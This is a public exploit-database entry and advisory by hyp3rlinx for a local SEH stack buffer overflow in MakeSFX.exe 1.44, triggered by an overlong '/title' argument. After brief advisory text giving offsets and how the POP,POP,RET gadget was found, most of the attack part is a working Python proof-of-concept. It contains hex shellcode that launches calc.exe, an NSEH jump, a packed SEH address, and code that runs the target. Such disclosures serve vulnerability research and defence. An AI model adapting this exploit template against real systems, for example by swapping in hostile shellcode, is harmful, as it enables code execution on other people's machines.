MakeSFX.exe 1.44 - Local Stack Buffer Overflow

EDB-ID:

38362

CVE:



Author:

hyp3rlinx

Type:

local


Platform:

Windows

Date:

2015-09-30


'''
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt



Vendor:
================================
freeextractor.sourceforge.net/FreeExtractor
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe


Vulnerable Product:
==================================================
MakeSFX.exe v1.44 
Mar 19 2001 & Dec 10 2009 versions



Vulnerability Type:
============================
Stack Based Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=========================
Converts a zip file into a 32-bit GUI Windows self-extractor.

Example usage:

makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
[/website="http://www.example.com"] [/intro="This is a test self extractor"]
[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow]
[/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe]
[/delete] [/icon="MyIcon.ico"] [/overwrite] [/?]

etc...

The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers
causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using
MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious
one attackers can cause mayhem on the system.

Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.
punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)


POC exploit code(s):
====================

We will exploit MakeSFX v1.44 (Mar 19 2001).

I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction
in outside modules and we find some...

e.g.

0x77319529 : pop esi # pop edi # ret  |  {PAGE_READONLY}


Python script to exploitz!
==========================
'''

import struct,os,subprocess

#MakeSFX v1.44 (Mar 19 2001)
pgm="C:\\hyp3rlinx\\MakeSFX.exe "

#shellcode to pop calc.exe
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

#punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM!

nseh="\xEB\x06"+"\x90"*2
seh=struct.pack('<L', 0x76F29529)

punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10  
subprocess.Popen([pgm, punksnotdead], shell=False)


'''
Disclosure Timeline:
=========================================================
Vendor Notification:  NA
Sept 30, 2015  : Public Disclosure



Exploitation Technique:
=======================
Local
Tested successfully on Windows SP1
DisableExceptionChainValidation in registry set to '1'
value of 1 disables the registry entry that prevents SEH overwrites.


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''